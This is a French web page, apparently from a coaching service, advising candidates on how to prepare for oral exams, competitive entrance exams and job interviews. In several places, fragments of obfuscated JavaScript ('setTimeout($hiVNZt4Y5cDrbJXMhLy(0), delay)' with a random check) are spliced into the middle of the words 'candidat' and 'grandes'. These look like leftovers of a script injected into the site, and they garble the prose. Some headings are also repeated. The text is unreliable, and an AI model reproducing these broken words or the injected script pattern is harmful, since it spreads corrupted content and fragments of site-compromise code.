Vos enjeux

Recrutement ou jury de sélection : 2 enjeux pour convaincre et rassurer !

Dans un entretien, la décision de vos interlocuteurs se prend parfois en quelques minutes. Et pourtant un entretien de sélection n’est pas un jeu de hasard dans lequel on peut justifier un échec en invoquant une quelconque malchance.

Votre jury est souriant, que pensent–ils réellement ?
Votre jury est souriant, que pensent–ils réellement ?

Vos recruteurs ou examinateurs cherchent avant tout à évaluer votre potentiel et l’adéquation possible entre vous et la proposition d’embauche ou d’admission. Votre jury observera et décryptera votre façon d’être et de paraître à la recherche de cette adéquation.

Même si cela va très vite, il est rare que les avis du jury divergent sur la perception finale du candom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}idat.

 

 

Toute sélection est un risque pour les examinateurs et ils cherchent à être rassurés sur leurs choix !

Cet entretien repose sur une alchimie subtile entre les différents protagonistes, vous serez l’acteur de cette alchimie attendue. Il faut  donc vous y préparer !

Développer une argumentation rassurante dans le contexte particulier de l’entretien se travaille, se réfléchit et se répète. Comme au théâtre, la posture, la diction et la confiance donnent l’efficacité au discours.

La liste des questions difficiles et les lectures adaptées via le net ou la littérature ne vous  suffiront pas, il  vous faut à la fois la théorie mais surtout comme pour les sportifs l’entrainement et les commentaires afin de progresser et  seul un accompagnement spécifique en face à face/ou en petit groupe peut vous aider efficacement.

 

Pour quels types d’épreuves précisément ?

1) Les examens

Il s’agit de prouver que l’on a suffisamment travaillé et que l’on maîtrise son sujet. Pour cela il est nécessaire de construire une confiance en soi que l’examinateur pourra ressentir en vous voyant.
L’argumentation doit être construite dans une gestion du temps compté. Le stress inévitable ne doit pas inhiber cette construction en vous interdisant de restituer sereinement vos connaissances acquises.
L’image que vous donnez de vous se travaille dès les premières épreuves orales du bac.

2/ Les concours

Un entretien se gagne avant l’entretien !
Un entretien se gagne avant l’entretien !

Un concours n’est pas un examen : Les places sont chères et seuls les meilleurs seront retenus !
L’écrit est une épreuve, l’oral en est une autre. Une réussite à l’écrit n’est pas le gage infaillible du succès à l’oral. Vous pouvez être bon, voire excellent à l’écrit. Mais vous devez aussi être le meilleur à l’oral, si ce n’est pas le cas, vos chances d’être retenu s’amenuisent.
Dans un concours, l’entretien dépend de vous mais aussi de la performance des autres candom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}idats. Votre objectif : donner une image de vous optimale !

 

Exemples :
Concours d’entrées dans les écoles : BTS, IUT, Master à l’université, Mastères Spécialisés, IUFM, concours de l’administration, et bien entendu les concours d’entrées dans les grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}es écoles de commerce ou d’ingénieurs.

3/ Les recrutements

Un jury ou un recruteur détient une proposition qu’il vous faut saisir.
Comme pour un concours, le meilleur CV ne suffit pas pour gagner… Un seul candom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}idat sera finalement retenu, souvent après 4 ou 5 entretiens. Pour convaincre, il faut être celui ou celle qui semblera le meilleur et le plus en phase avec la proposition du recruteur.
Un bon CV vous mettra en bonne position, mais c’est votre prestation orale qui fera la différence.

L’image positive et sincère que vous donnerez de vous sera un plus pour convaincre.
L’image positive et sincère que vous donnerez de vous sera un plus pour convaincre.

Devant un recruteur, le poids de l’enjeu peut vous faire perdre vos moyens.

Vous préparez un entretien de premier emploi ou de stage ? Même si l’oral est votre talon d’Achille, avec un dossier ou un parcours de qualité, une bonne préparation peut vous faire passer au-dessus de la barre.

Il vaut mieux mettre toutes les chances de votre côté !

 

 

Exemples :
Entretiens de stage de fin d’études : porte ouverte sur l’emploi.
Entretiens d’embauche pour les premiers postes: CDD, CDI ou VIE.